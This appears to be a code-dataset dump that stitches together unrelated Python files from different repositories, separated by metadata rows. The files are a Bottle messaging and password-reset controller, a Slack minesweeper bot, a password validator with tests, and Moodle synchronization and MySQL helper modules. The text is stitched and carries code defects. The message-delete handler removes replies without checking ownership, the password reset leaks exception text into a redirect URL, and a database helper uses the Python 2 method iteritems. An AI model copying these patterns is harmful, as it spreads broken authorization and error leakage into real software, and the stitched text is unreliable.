Returns the view for the 404 page
'''
# return page_view("error404", page_title="404 Not Found")
return template("templates/error404")
#-----------------------------------------------------------------------------
# logout
#-----------------------------------------------------------------------------
def logout():
'''
logout
'''
aaa.logout(success_redirect='/home')
# Returns a random string each time
def about_garble():
'''
about_garble
Returns one of several strings for the about page
'''
garble = ["leverage agile frameworks to provide a robust synopsis for high level overviews.",
"iterate approaches to corporate strategy and foster collaborative thinking to further the overall value proposition.",
"organically grow the holistic world view of disruptive innovation via workplace diversity and empowerment.",
"bring to the table win-win survival strategies to ensure proactive domination.",
"ensure the end of the day advancement, a new normal that has evolved from generation X and is on the runway heading towards a streamlined cloud solution.",
"provide user generated content in real-time will have multiple touchpoints for offshoring."]
return garble[random.randint(0, len(garble) - 1)]
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
def message(db):
aaa.require(fail_redirect='/login')
current_user = aaa.current_user.username
from_mes = query_db(db, 'SELECT * from messages where from_user=?', (current_user,))
to_mes = query_db(db, 'SELECT * from messages where to_user=?', (current_user,))
message_ids = [x["id"] for x in from_mes] + [x["id"] for x in to_mes]
format_strings=','.join(['?'] * len(message_ids))
r_sql = 'SELECT * FROM replies where message_id in (%s)' % format_strings
replies = query_db(db, r_sql,
tuple(message_ids))
# print('SELECT * FROM replies from message_id in (?)' % format_strings)
return page_view("message", page_title = "Message", from_me_messages = json.dumps(from_mes),
to_me_messages = json.dumps(to_mes), replies = json.dumps(replies), **current_user_data())
def message_post(db):
result ={'error': 1}
if aaa.user_is_anonymous:
result['msg'] = 'Please Login!'
return json.dumps(result)
from_user = aaa.current_user.username
to_user = request.forms.get('to_user')
subject = request.forms.get('subject')
body = request.forms.get('body')
# simple from validation
if (not to_user) or (not subject) or (not body):
result['msg'] = 'Please complete the form!'
return json.dumps(result)
if not aaa.user(to_user):
result['msg'] = '"To" user cannot be found! Please check.'
return json.dumps(result)
if to_user == from_user:
result['msg'] = 'You cannot send message to yourself!'
return json.dumps(result)
# input filter for security purpose
subject=escape(repr(subject)[1:-1])
body=escape(repr(body)[1:-1])
try:
db.execute(
"""INSERT INTO messages(from_user, to_user, subject, body, create_at) VALUES (?,?,?,?,?)""",
(from_user, to_user, subject, body, datetime.now().strftime('%Y-%m-%d-%H:%M:%S')))
except Exception as e:
result['msg'] = 'Database error! Please contact the administrator!'
print(e)
return json.dumps(result)
result['error'] = 0
result['msg'] = 'Message has been sent successfully!'
return json.dumps(result)
def message_delete(message_id, db):
result={'error': 1}
if aaa.user_is_anonymous:
result['msg'] = 'Please Login!'
return json.dumps(result)
current_user = aaa.current_user.username;
try:
db.execute(
"""DELETE FROM messages WHERE id=? AND (from_user=? OR to_user=?)""",
(message_id, current_user, current_user,))
db.execute(
"""DELETE FROM replies WHERE message_id=?""",
(message_id,))
except Exception as e:
result['msg'] = 'Database error! Please contact the administrator!'
print(e)
return json.dumps(result)
result['error'] = 0
result['msg'] = 'Message has been deleted successfully!'
return json.dumps(result)
def message_reply_post(db):
result={'error': 1}
if aaa.user_is_anonymous:
result['msg'] = 'Please Login!'
return json.dumps(result)
current_user = aaa.current_user.username
from_user = current_user
body = request.forms.get('replay')
body = escape(repr(body)[1:-1])
message_id = request.forms.get('msg_id')
try:
db.execute(
"""INSERT INTO replies(from_user, message_id, body, create_at) VALUES (?,?,?,?)""",
(from_user, message_id, body, datetime.now().strftime('%Y-%m-%d-%H:%M:%S')))
except Exception as e:
result['msg'] = 'Database error! Please contact the administrator!'
print(e)
return json.dumps(result)
result['error'] = 0
result['msg'] = 'The Reply has been sent successfully!'
return json.dumps(result)
def profile():
aaa.require(fail_redirect='/login')
return template("templates/profile.html", **current_user_data())
#return page_view("profile", page_title = "Profile", **current_user_data())
def manage_user():
aaa.require(fail_redirect='/login')
if aaa.current_user.role=='user':
return error404()
else:
return template("templates/manage_user.html", **all_user_data())
def reset_password():
aaa.require(fail_redirect='/login')
return page_view("reset_password", page_title = "Reset Password", **current_user_data())
def reset_password_post(old_password, new_password, confirm_password):
result ={'error': 1}
if aaa.user_is_anonymous:
result['msg'] = 'Please Login!'
return json.dumps(result)
reason = ""
current_user = aaa.current_user
if old_password == "" or new_password == "" or confirm_password == "": # Wrong Username
reason = "Please complete the form!"
salted_hash = aaa._store.users[current_user.username]["hash"]
if hasattr(salted_hash, "encode"):
salted_hash=salted_hash.encode("ascii")
authenticated=aaa._verify_password(current_user.username, old_password, salted_hash)
if not authenticated:
reason = "Old password is not valid! Please check."
if new_password != confirm_password:
reason = "Password are not matching."
if reason != "":
return redirect("/invalid?reason=" + reason)
try:
"""Change password"""
aaa.reset_password(aaa._reset_code(current_user.username, current_user.email_addr), new_password)
except Exception as e:
reason = 'Caught this server error: ' + repr(e)
if reason != "":
return redirect("/invalid?reason=" + reason)
else:
return aaa.logout(success_redirect="/invalid?reason=Your%20password%20has%20been%20changed,%20please%20login%20in%20again!")
# util functions
def convert_to_json(cursor):
return json.dumps([dict(zip([column[0] for column in cursor.description], row))
for row in cursor.fetchall()])
def query_db(db, query, args=(), one=False):
cur = db.cursor()
cur.execute(query, args)
r = [dict((cur.description[i][0], value) \
for i, value in enumerate(row)) for row in cur.fetchall()]
return (r[0] if r else None) if one else r
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,237 | odasatoshi/slack-minesweeper | refs/heads/master | /plugins/minesweep.py | import random
class Minesweeper:
NULL = 0
MINE = 9
BOOM = 10
FLAG = "flag"
OPENED = True
UNOPENED = False
def __init__(self, size = 4, mineraito = 0.2):
self.init_stage(size, mineraito)
def init_stage(self, size, mineraito):
self.size = size
self.mineraito = mineraito
self.stage = [[self.NULL if random.random() > mineraito else self.MINE \
for i in range(self.size)]
for j in range(self.size)]
self.state = [[self.UNOPENED \
for i in range(self.size)]
for j in range(self.size)]
self.stage = [[self.neighbormines(i, j)
for i in range(self.size)]
for j in range(self.size)]
def remnants(self):
rem = 0
mine = 0
for i in range(self.size):
for j in range(self.size):
if ((self.state[i][j] == self.UNOPENED) or (self.state[i][j] == self.FLAG)):
rem = rem + 1
for i in range(self.size):
for j in range(self.size):
if (self.stage[i][j] == self.MINE):
mine = mine + 1
return rem - mine
# Return the number of neighbor mines.
# If self is mine, return self.MINE
def neighbormines(self, row, col):
if self.stage[row][col] == self.MINE :
return self.MINE
mines = 0
for i in range(-1, 2):
for j in range(-1, 2):
if i == 0 and j == 0:
continue
elif -1 < (row + i) < self.size and -1 < (col + j) < self.size:
if self.stage[row+i][col+j] == self.MINE:
mines = mines + 1
return mines
# Return the number of neighbor flags.
def neighborflags(self, row, col):
flags = 0
for i in range(-1, 2):
for j in range(-1, 2):
if i == 0 and j == 0:
continue
elif -1 < (row + i) < self.size and -1 < (col + j) < self.size:
if self.state[row+i][col+j] == self.FLAG:
flags = flags + 1
return flags
# Sweep open and unflagged neighbors.
# If sweep fails, fullopen the cell to boom the place.
def sweep_neighbors(self, row, col):
for i in range(-1, 2):
for j in range(-1, 2):
if i == 0 and j == 0:
continue
elif -1 < (row + i) < self.size and -1 < (col + j) < self.size:
ret = self.sweep(row+i, col+j)
if ret == False :
self.fullopen(row+i, col+j)
return False
return True
def sweep(self, row , col):
if self.state[row][col] == self.UNOPENED :
self.state[row][col] = self.OPENED
if self.stage[row][col] == 0:
for i in range(-1, 2):
for j in range(-1, 2):
if -1 < (row + i) < self.size and -1 < (col + j) < self.size:
self.sweep(row+i, col+j)
return self.stage[row][col] != self.MINE
return True
def flag(self, row, col):
if self.state[row][col] == self.UNOPENED :
self.state[row][col] = self.FLAG
elif self.state[row][col] == self.FLAG :
self.state[row][col] = self.UNOPENED
# Sweep neighbors only when the number of neighbor flags is accurate
def left_right_click(self, row, col):
if self.state[row][col] == self.OPENED :
if self.neighborflags(row, col) == self.stage[row][col] :
return self.sweep_neighbors(row, col)
return True
def fullopen(self, row, col):
self.state = [[self.OPENED \
for i in range(self.size)]
for j in range(self.size)]
self.stage[row][col] = self.BOOM
def shaping(self, instr):
comstr = instr.replace(" ","")
row, col = comstr.split(",")
return int(row), int(col)
def generate_message(self):
mess = ""
for i in range(self.size):
for j in range(self.size):
if self.state[i][j] == self.UNOPENED :
mess = mess + ":white_square_button:"
elif self.state[i][j] == self.FLAG :
mess = mess + ":triangular_flag_on_post:"
else:
if self.stage[i][j] == 0:
mess = mess + ":white_square:"
if self.stage[i][j] == 1:
mess = mess + ":one:"
if self.stage[i][j] == 2:
mess = mess + ":two:"
if self.stage[i][j] == 3:
mess = mess + ":three:"
if self.stage[i][j] == 4:
mess = mess + ":four:"
if self.stage[i][j] == 5:
mess = mess + ":five:"
if self.stage[i][j] == 6:
mess = mess + ":six:"
if self.stage[i][j] == 7:
mess = mess + ":seven:"
if self.stage[i][j] == 8:
mess = mess + ":eight:"
if self.stage[i][j] == 9:
mess = mess + ":bomb:"
if self.stage[i][j] == 10:
mess = mess + ":boom:"
mess = mess + "\n"
return mess
def show_debug(self):
for i in range(self.size):
for j in range(self.size):
if self.state[i][j] == self.UNOPENED :
print("X",end="")
else:
print(self.stage[i][j], end="")
print("\n" ,end="")
"""
ms = Minesweeper(7, 0.1)
while 1:
ms.show_debug()
inkey = input()
row, col = ms.shaping(inkey)
if ms.sweep(row, col) == False :
ms.fullopen(row, col)
ms.show_debug()
ms = Minesweeper(7, 0.1)
"""
| {"/plugins/slack_sweeper.py": ["/plugins/minesweep.py"]} |
78,238 | odasatoshi/slack-minesweeper | refs/heads/master | /slackbot_settings.py | # coding: utf-8
DEFAULT_REPLY = "I'm a mine sweeper"
PLUGINS = ['plugins']
| {"/plugins/slack_sweeper.py": ["/plugins/minesweep.py"]} |
78,239 | odasatoshi/slack-minesweeper | refs/heads/master | /plugins/slack_sweeper.py | # coding: utf-8
from slackbot.bot import listen_to
from plugins.minesweep import Minesweeper
ms = Minesweeper(10, 0.2)
@listen_to('.*start.*')
def mention_func(message):
global ms
ms = Minesweeper(10, 0.2)
message.send(ms.generate_message())
@listen_to('^\d{1},\d{1}$')
def listen_func(message):
global ms
row, col = ms.shaping(message.body['text'])
if ms.sweep(row, col) == False :
ms.fullopen(row, col)
die(message)
message.send(ms.generate_message())
if (ms.remnants() == 0):
complete(message)
else:
message.send("あと、" + str(ms.remnants()) + "個掃除してください")
@listen_to('^f\d{1},\d{1}$')
def flag(message):
global ms
row, col = ms.shaping(message.body['text'][1:])
ms.flag(row, col)
message.send(ms.generate_message())
@listen_to('^lr\d{1},\d{1}$')
def left_right_click(message):
global ms
row, col = ms.shaping(message.body['text'][2:])
if ms.left_right_click(row, col) == False :
die(message)
message.send(ms.generate_message())
if (ms.remnants() == 0):
complete(message)
else:
message.send("あと、" + str(ms.remnants()) + "個掃除してください")
def die(message):
global ms
message.send(ms.generate_message())
message.send("あなたは死にました")
ms = Minesweeper(10, 0.2)
def complete(message):
global ms
message.send("おめでとう")
ms = Minesweeper(10, 0.2)
| {"/plugins/slack_sweeper.py": ["/plugins/minesweep.py"]} |
78,245 | trikitrok/PasswordValidatorInPython | refs/heads/master | /password_validator_tests.py | import pytest
from password_validator import PasswordValidator
@pytest.fixture
def validator():
return PasswordValidator(8)
def test_a_strong_password(validator):
assert validator.is_strong_password("#Ab3cccc") is True
def test_that_only_passwords_with_the_minimum_length_are_strong(validator):
assert validator.is_strong_password("#Ab3ccc") is False
def test_that_only_passwords_including_numbers_are_strong(validator):
assert validator.is_strong_password("#Abccccc") is False
def test_that_only_passwords_including_upper_case_letters_are_strong(validator):
assert validator.is_strong_password("#ab3cccc") is False
def test_that_only_passwords_including_lower_case_letters_are_strong(validator):
assert validator.is_strong_password("#AB3CCCC") is False
def test_that_only_passwords_including_special_characters_are_strong(validator):
assert validator.is_strong_password("cAb3cccc") is False
| {"/password_validator_tests.py": ["/password_validator.py"]} |
78,246 | trikitrok/PasswordValidatorInPython | refs/heads/master | /password_validator.py | import re
class PasswordValidator(object):
def __init__(self, minimum_length):
self.minimum_length = minimum_length
def is_strong_password(self, password):
includes_special_characters = self._includes_any(self.REQUIRED_SPECIAL_CHARACTERS, password)
includes_lower_case_letters = self._includes_any(self.LOWER_CASE_LETTERS, password)
includes_upper_case_letters = self._includes_any(self.UPPER_CASE_LETTERS, password)
includes_numbers = self._includes_any(self.NUMBERS, password)
has_minimum_length = len(password) >= self.minimum_length
return \
has_minimum_length and \
includes_numbers and \
includes_upper_case_letters and \
includes_lower_case_letters and \
includes_special_characters
@staticmethod
def _includes_any(pattern, password):
return re.search(pattern, password) is not None
REQUIRED_SPECIAL_CHARACTERS = '[%#]'
UPPER_CASE_LETTERS = '[A-Z]'
LOWER_CASE_LETTERS = '[a-z]'
NUMBERS = '[0-9]'
| {"/password_validator_tests.py": ["/password_validator.py"]} |
78,254 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /test/test_timestamp.py | import os
import tempfile
import pytest
from synchromoodle import timestamp
from synchromoodle.config import TimestampStoreConfig
@pytest.fixture(name='tmp_file')
def tmp_file():
fd, tmp_file = tempfile.mkstemp()
os.close(fd)
yield tmp_file
os.remove(tmp_file)
def test_mark(tmp_file):
ts = timestamp.TimestampStore(TimestampStoreConfig(file=tmp_file))
ts.mark("UAI1")
assert ts.get_timestamp("UAI1") == ts.now
ts.mark("UAI2")
assert ts.get_timestamp("UAI2") == ts.now
def test_read_write(tmp_file):
ts1 = timestamp.TimestampStore(TimestampStoreConfig(file=tmp_file))
ts2 = timestamp.TimestampStore(TimestampStoreConfig(file=tmp_file), now=ts1.now)
ts1.mark("UAI")
ts1.write()
ts2.read()
assert ts2.get_timestamp("UAI") == ts1.now
ts1.mark("UAI2")
ts1.write()
ts2.read()
assert ts2.get_timestamp("UAI2") == ts1.now
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,255 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /synchromoodle/timestamp.py | """
Gestion des timestamps
"""
import datetime
import os
import re
from logging import getLogger
from typing import Dict
from synchromoodle.config import TimestampStoreConfig
date_format = '%Y%m%d%H%M%S'
log = getLogger('timestamp')
def fromisoformat(iso: str) -> datetime.datetime:
"""
Parse Datetime ISO Format
:param iso:
:return:
"""
return datetime.datetime(*map(int, re.split(r'[^\d]', iso)))
class TimestampStore:
"""
Stocker les timestamp de dernière modification pour les établissements.
Permet de ne traiter que les utilisateurs ayant subi une modification depuis le dernier traitement.
"""
def __init__(self, config: TimestampStoreConfig, now: datetime.datetime = None):
self.config = config
self.now = now if now else datetime.datetime.now()
self.timestamps = {} # type: Dict[str, datetime.datetime]
self.read()
def get_timestamp(self, uai: str) -> datetime.datetime:
"""
Obtient le timestamp d'un établissement
:param uai: code établissement
:return: timestamp
"""
return self.timestamps.get(uai.upper())
def read(self):
"""
Charge le fichier contenant la date des derniers traitement
"""
self.timestamps.clear()
try:
with open(self.config.file, 'r') as time_stamp_file:
for line in time_stamp_file.readlines():
line = line.strip(os.linesep)
if line:
etab_and_time = line.split(self.config.separator, 1)
etab = etab_and_time[0]
time_stamp = etab_and_time[1]
self.timestamps[etab] = fromisoformat(time_stamp)
except IOError:
log.warning("Impossible d'ouvrir le fichier : %s", self.config.file)
def write(self):
"""
Ecrit le fichier contenant la date de derniers traitement des établissements.
"""
with open(self.config.file, 'w') as time_stamp_file:
time_stamp_file.writelines(
map(lambda item: item[0].upper() + self.config.separator + item[1].isoformat() + os.linesep,
self.timestamps.items()))
def mark(self, uai: str):
"""
Ajoute le timestamp courant pour l'établissement donné.
:param uai: code établissement
"""
self.timestamps[uai.upper()] = self.now
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,256 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /synchromoodle/__version__.py | # coding: utf-8
"""
Version module
"""
# pragma: no cover
__version__ = '1.1.4'
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,257 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /synchromoodle/arguments.py | """
Arguments
"""
from argparse import ArgumentParser
from synchromoodle.__version__ import __version__
def parse_args(args=None, namespace=None):
"""
Parse arguments
:param args:
:param namespace:
:return:
"""
parser = ArgumentParser()
parser.add_argument("-v", "--version", action="version", version='%(prog)s ' + __version__)
parser.add_argument("-c", "--config", action="append", dest="config", default=[],
help="Chemin vers un fichier de configuration. Lorsque cette option est utilisée plusieurs "
"fois, les fichiers de configuration sont alors fusionnés.")
arguments = parser.parse_args(args, namespace)
return arguments
DEFAULT_ARGS = parse_args([])
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,258 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /synchromoodle/dbutils.py | # coding: utf-8
# pylint: disable=too-many-lines
"""
Accès à la base de données Moodle
"""
import mysql.connector
from mysql.connector import MySQLConnection
from mysql.connector.cursor import MySQLCursor
from synchromoodle.config import DatabaseConfig, ConstantesConfig
###############################################################################
# CONSTANTS
###############################################################################
#######################################
# CONTEXTES
#######################################
# Id du contexte systeme
ID_CONTEXT_SYSTEM = 1
# Profondeur pour le contexte etablissement
PROFONDEUR_CTX_ETAB = 2
# Profondeur pour le contexte du bloc de recherche de la zone privee
PROFONDEUR_CTX_BLOCK_ZONE_PRIVEE = 4
# Profondeur pour le contexte du module de la zone privee
PROFONDEUR_CTX_MODULE_ZONE_PRIVEE = 4
# Profondeur pour le contexte de la zone privee
PROFONDEUR_CTX_ZONE_PRIVEE = 3
#######################################
# COURS
#######################################
# Format pour la zone privee d'un etablissement
COURSE_FORMAT_ZONE_PRIVEE = "topics"
# Fullname pour la zone privee d'un etablissement
COURSE_FULLNAME_ZONE_PRIVEE = "Zone privée"
# Shortname pour la zone privee d'un etablissement
# Le (%s) est reserve au siren de l'etablissement
COURSE_SHORTNAME_ZONE_PRIVEE = "ZONE-PRIVEE-%s"
# Summary pour la zone privee d'un etablissement
# Le (%s) est reserve a l'organisation unit de l'etablissement
COURSE_SUMMARY_ZONE_PRIVEE = "Forum réservé au personnel éducatif de l'établissement %s"
# Visibilite pour la zone privee d'un etablissement
COURSE_VISIBLE_ZONE_PRIVEE = 0
#######################################
# MODULE DE COURS
#######################################
# Nombre pour le module du forum dans la zone privee
COURSE_MODULES_MODULE = 5
#######################################
# ROLES
#######################################
# Enrol method => manual enrolment
ENROL_METHOD_MANUAL = "manual"
# Shortname du role admin local
SHORTNAME_ADMIN_LOCAL = "adminlocal"
# Shortname du role extended teacher
SHORTNAME_EXTENDED_TEACHER = "extendedteacher"
# Shortname du role advanced teacher
SHORTNAME_ADVANCED_TEACHER = "advancedteacher"
#######################################
# USER
#######################################
# Default authentication mode for a user
USER_AUTH = "cas"
# Default city for a user
USER_CITY = "Non renseignée"
# Default country for a user
USER_COUNTRY = "FR"
# Default language for a user
USER_LANG = "fr"
# Default moodle site for the user
# This field is a foreign key of the mdl_mnet_host
# Here "3" stands for the ID of lycees.netocentre.fr
USER_MNET_HOST_ID = 3
def array_to_safe_sql_list(elements, name=None):
"""
:param elements:
:param name:
:return:
"""
if name:
format_strings = []
params = {}
for i, element in enumerate(elements):
format_strings.append('%({name}_{i})s'.format(name=name, i=i))
params['{name}_{i}'.format(name=name, i=i)] = element
return ','.join(format_strings), params
format_strings = ['%s'] * len(elements)
params = tuple(elements)
return ','.join(format_strings), params
class Cohort:
"""
Données associées à une cohorte.
"""
def __init__(self, cohortid=None, contextid=None,
name=None, idnumber=None,
description=None, descriptionformat=None,
visible=None, component=None,
timecreated=None, timemodified=None,
theme=None):
self.id = cohortid
self.contextid = contextid
self.name = name
self.idnumber = idnumber
self.description = description
self.descriptionformat = descriptionformat
self.visible = visible
self.component = component
self.timecreated = timecreated
self.timemodified = timemodified
self.theme = theme
class Database:
"""
Couche d'accès à la base de données Moodle.
"""
config = None # type: DatabaseConfig
constantes = None # type: ConstantesConfig
connection = None # type: MySQLConnection
mark = None # type: MySQLCursor
entete = None # type: str
def __init__(self, config: DatabaseConfig, constantes: ConstantesConfig):
self.config = config
self.constantes = constantes
self.entete = config.entete
def connect(self):
"""
Etablit la connexion à la base de données Moodle
:return:
"""
self.connection = mysql.connector.connect(host=self.config.host,
user=self.config.user,
passwd=self.config.password,
db=self.config.database,
charset=self.config.charset,
port=self.config.port)
self.mark = self.connection.cursor()
def disconnect(self):
"""
Ferme la connexion à la base de données Moodle
:return:
"""
if self.mark:
self.mark.close()
self.mark = None
if self.connection:
self.connection.close()
self.connection = None
def safe_fetchone(self):
"""
Retourne uniquement 1 résultat et lève une exception si la requête invoquée récupère plusieurs resultats
:return:
"""
rows = self.mark.fetchall()
count = len(rows)
if count > 1:
raise mysql.connector.DatabaseError("Résultat de requête SQL invalide: 1 résultat attendu, %d reçus:\n%s"
% (count, self.mark.statement))
return rows[0] if count == 1 else None
def add_role_to_user(self, role_id, id_context, id_user):
"""
Fonction permettant d'ajouter un role a un utilisateur
pour un contexte donne
:param role_id: int
:param id_context: int
:param id_user: int
:return:
"""
id_role_assignment = self.get_id_role_assignment(role_id, id_context, id_user)
if not id_role_assignment:
# Ajout du role dans le contexte
s = "INSERT INTO {entete}role_assignments( roleid, contextid, userid )" \
" VALUES ( %(role_id)s, %(id_context)s, %(id_user)s )".format(entete=self.entete)
self.mark.execute(s, params={'role_id': role_id, 'id_context': id_context, 'id_user': id_user})
def remove_role_to_user(self, role_id, id_context, id_user):
"""
Fonction permettant de supprimer un role a un utilisateur
pour un contexte donne
:param role_id: int
:param id_context: int
:param id_user: int
:return:
"""
id_role_assignment = self.get_id_role_assignment(role_id, id_context, id_user)
if id_role_assignment:
# Ajout du role dans le contexte
s = "DELETE FROM {entete}role_assignments" \
" WHERE roleid = %(role_id)s" \
" AND contextid = %(id_context)s" \
" AND userid = %(id_user)s".format(entete=self.entete)
self.mark.execute(s, params={'role_id': role_id, 'id_context': id_context, 'id_user': id_user})
def get_id_role_assignment(self, role_id, id_context, id_user):
"""
Fonction permettant de recuperer l'id d'un role
assignement au sein de la BD moodle.
:param role_id: int
:param id_context: int
:param id_user: int
:return:
"""
s = "SELECT id FROM {entete}role_assignments" \
" WHERE roleid = %(role_id)s AND contextid = %(id_context)s AND userid = %(id_user)s" \
" LIMIT 1" \
.format(entete=self.entete)
self.mark.execute(s, params={'role_id': role_id, 'id_context': id_context, 'id_user': id_user})
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def add_role_to_user_for_contexts(self, role_id, ids_contexts_by_courses, id_user):
"""
Fonction permettant d'ajouter un role a un utilisateur
pour plusieurs contextes donnes
:param role_id:
:param ids_contexts_by_courses:
:param id_user:
:return:
"""
for id_course, id_context in ids_contexts_by_courses.iteritems():
self.add_role_to_user(role_id, id_context, id_user)
self.enroll_user_in_course(role_id, id_course, id_user)
def enroll_user_in_course(self, role_id, id_course, id_user):
"""
Fonction permettant d'enroler un utilisateur dans un
cours
:param role_id:
:param id_course:
:param id_user:
:return:
"""
id_enrol = self.get_id_enrol(ENROL_METHOD_MANUAL, role_id, id_course)
if not id_enrol:
# Ajout de la methode d'enrolment dans le cours
s = "INSERT INTO {entete}enrol(enrol, courseid, roleid)" \
" VALUES (%(ENROL_METHOD_MANUAL)s, %(id_course)s, %(role_id)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'ENROL_METHOD_MANUAL': ENROL_METHOD_MANUAL, 'id_course': id_course,
'role_id': role_id})
id_enrol = self.get_id_enrol_max()
if id_enrol:
# Enrolement de l'utilisateur dans le cours
s = "INSERT IGNORE INTO {entete}user_enrolments(enrolid, userid)" \
" VALUES (%(id_enrol)s, %(id_user)s)" \
.format(entete=self.entete)
self.mark.execute(s, params={'id_enrol': id_enrol, 'id_user': id_user})
def get_id_enrol_max(self):
"""
Récupère l'id maximum present dans la table permettant les enrolments
:return:
"""
s = "SELECT id FROM {entete}enrol" \
" ORDER BY id DESC LIMIT 1" \
.format(entete=self.entete)
self.mark.execute(s)
ligne = self.safe_fetchone()
if ligne is None:
return None
return ligne[0]
def create_cohort(self, id_context, name, id_number, description, time_created):
"""
Fonction permettant de creer une nouvelle cohorte pour
un contexte donne.
:param id_context:
:param name:
:param id_number:
:param description:
:param time_created:
:return:
"""
s = "INSERT INTO {entete}cohort(contextid, name, idnumber, description, descriptionformat, timecreated," \
" timemodified)" \
" VALUES (%(id_context)s, %(name)s, %(id_number)s, %(description)s, 0, %(time_created)s," \
" %(time_created)s)" \
